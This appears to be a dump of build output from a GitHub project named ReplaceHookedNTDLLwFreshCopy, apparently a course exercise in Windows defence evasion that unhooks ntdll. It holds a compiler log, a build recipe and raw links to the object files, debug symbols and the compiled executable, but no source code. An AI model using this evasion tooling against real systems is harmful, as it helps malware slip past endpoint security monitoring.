--------------------------------------------------------------------------------
/ReplaceHookedNTDLLwFreshCopy/x64/Release/ReplaceH.00c07e1a.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Allevon412/ClassicAPIUnhooking/0fee92a9546c5df5dadcb2d640fb11683de728f0/ReplaceHookedNTDLLwFreshCopy/x64/Release/ReplaceH.00c07e1a.tlog/link.write.1.tlog
--------------------------------------------------------------------------------
/ReplaceHookedNTDLLwFreshCopy/x64/Release/ReplaceHookedNTDLLwFreshCopy.exe.recipe:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | C:\sektor7\Win_Evasion\WEv\02.Non-Admin\01.Unhooks\02.FreshCopy\ReplaceHookedNTDLLwFreshCopy\x64\Release\ReplaceHookedNTDLLwFreshCopy.exe
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/ReplaceHookedNTDLLwFreshCopy/x64/Release/ReplaceHookedNTDLLwFreshCopy.iobj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Allevon412/ClassicAPIUnhooking/0fee92a9546c5df5dadcb2d640fb11683de728f0/ReplaceHookedNTDLLwFreshCopy/x64/Release/ReplaceHookedNTDLLwFreshCopy.iobj
--------------------------------------------------------------------------------
/ReplaceHookedNTDLLwFreshCopy/x64/Release/ReplaceHookedNTDLLwFreshCopy.ipdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Allevon412/ClassicAPIUnhooking/0fee92a9546c5df5dadcb2d640fb11683de728f0/ReplaceHookedNTDLLwFreshCopy/x64/Release/ReplaceHookedNTDLLwFreshCopy.ipdb
--------------------------------------------------------------------------------
/ReplaceHookedNTDLLwFreshCopy/x64/Release/ReplaceHookedNTDLLwFreshCopy.log:
--------------------------------------------------------------------------------
1 | main.cpp
2 | Generating code
3 | Previous IPDB not found, fall back to full compilation.
4 | All 9 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
5 | Finished generating code
6 | ReplaceHookedNTDLLwFreshCopy.vcxproj -> C:\sektor7\Win_Evasion\WEv\02.Non-Admin\01.Unhooks\02.FreshCopy\ReplaceHookedNTDLLwFreshCopy\x64\Release\ReplaceHookedNTDLLwFreshCopy.exe
7 |
--------------------------------------------------------------------------------
/ReplaceHookedNTDLLwFreshCopy/x64/Release/main.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Allevon412/ClassicAPIUnhooking/0fee92a9546c5df5dadcb2d640fb11683de728f0/ReplaceHookedNTDLLwFreshCopy/x64/Release/main.obj
--------------------------------------------------------------------------------
/ReplaceHookedNTDLLwFreshCopy/x64/Release/vc142.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Allevon412/ClassicAPIUnhooking/0fee92a9546c5df5dadcb2d640fb11683de728f0/ReplaceHookedNTDLLwFreshCopy/x64/Release/vc142.pdb
--------------------------------------------------------------------------------
/x64/Release/ReplaceHookedNTDLLwFreshCopy.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Allevon412/ClassicAPIUnhooking/0fee92a9546c5df5dadcb2d640fb11683de728f0/x64/Release/ReplaceHookedNTDLLwFreshCopy.exe
--------------------------------------------------------------------------------
/x64/Release/ReplaceHookedNTDLLwFreshCopy.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Allevon412/ClassicAPIUnhooking/0fee92a9546c5df5dadcb2d640fb11683de728f0/x64/Release/ReplaceHookedNTDLLwFreshCopy.pdb
--------------------------------------------------------------------------------